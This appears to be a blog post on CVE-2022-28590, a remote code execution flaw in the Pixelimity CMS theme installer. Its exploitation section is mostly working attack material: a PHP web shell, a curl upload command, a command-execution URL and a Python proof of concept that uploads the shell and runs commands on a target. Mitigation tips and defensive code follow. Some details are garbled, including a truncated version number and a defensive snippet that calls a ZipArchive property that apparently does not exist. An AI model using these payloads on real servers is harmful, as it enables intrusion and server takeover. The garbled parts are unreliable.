CVE-2022-28590 - Exploiting RCE in Pixelimity 1. via admin-ajax.php Theme Installer

A critical security vulnerability, identified as CVE-2022-28590, affects the Pixelimity 1. CMS. This is a classic Remote Code Execution (RCE) issue that lurks in its theme installation feature. If you run a Pixelimity-based website, you could be at risk—even if you think it’s a small and hidden site.

This deep-dive post explains the vulnerability, walks through step-by-step exploitation, shows sample malicious payloads, and offers mitigation pointers. Whether you’re a developer, sysadmin, or just a curious techie, you’ll learn why even “minor” PHP platforms matter to hackers.

Pixelimity allows admins to install new themes using an AJAX function

/admin/admin-ajax.php?action=install_theme

However, input validation was either missing or flawed in v1.. Attackers could upload zipped “themes” containing PHP files, which the system would then unzip and drop straight into executable directories. If an attacker uploads a fake theme with web shell code, they can remotely control the whole server.

Lets attackers upload arbitrary files, not just safe themes

- Web shell can offer root/system-level code execution

1. The Upload Mechanism

Pixelimity’s AJAX endpoint lets users POST a zip file. Here’s a simplified representation of a vulnerable handler:

// admin/admin-ajax.php
if ($_GET['action'] == 'install_theme') {
    $file = $_FILES['theme_zip'];
    $zip = new ZipArchive;
    if ($zip->open($file['tmp_name']) === TRUE) {
        $zip->extractTo('../themes/' . $theme_dir);
        $zip->close();
        echo "Theme installed!";
    } else {
        echo "Failed!";
    }
}

shell.php

<?php system($_GET['cmd']); ?>

With curl or Burp Suite, the attacker sends

curl -X POST \
  -F "theme_zip=@theme.zip" \
  "http://victim-site.com/admin/admin-ajax.php?action=install_theme";

Once uploaded, the attacker can run commands by browsing to

http://victim-site.com/themes/theme_dir/shell.php?cmd=whoami

Replace whoami with any Linux/Windows command.

Here’s a mini-PoC in Python for uploading your shell

import requests

url = 'http://target-site.com/admin/admin-ajax.php?action=install_theme';
files = {'theme_zip': ('theme.zip', open('theme.zip', 'rb'))}
res = requests.post(url, files=files)
print('[+] Upload:', res.text)

# Access the shell:
shell_url = 'http://target-site.com/themes/badtheme/shell.php?cmd=id';
r = requests.get(shell_url)
print('[+] Shell Output:', r.text)

References

- CVE Report for CVE-2022-28590
- Original Pixelimity code (GitHub)
- Exploit Details (ExploitDB)
- OWASP File Upload Vulnerabilities

How to Fix & Protect Yourself

- Patch: Update to the latest Pixelimity version or apply any available hotfixes from the developer.

Authentication: Require admin login before allowing theme installation.

- Monitor: Scan your webroot for unexpected .php files in /themes/.

Example defensive code

// Example: blocking PHP files in uploads
foreach ($zip->files as $file) {
    if (preg_match('/\.php$/i', $file->name)) {
        die("Blocked invalid file in theme!");
    }
}

Conclusion

CVE-2022-28590 is a textbook example of the danger in trusting user uploads, especially in admin tools. RCE bugs like this are how sites get defaced, data gets stolen, or a little-used server becomes a launchpad for wider attacks.

If you use any “lightweight” CMS like Pixelimity, scan your code for insecure file upload and extraction. Patch today; don’t wait for the next scan.


Stay safe!
For questions or tech details, see the NVD CVE page or the Pixelimity repo.

Timeline

Published on: 05/03/2022 14:15:00 UTC
Last modified on: 05/09/2022 20:53:00 UTC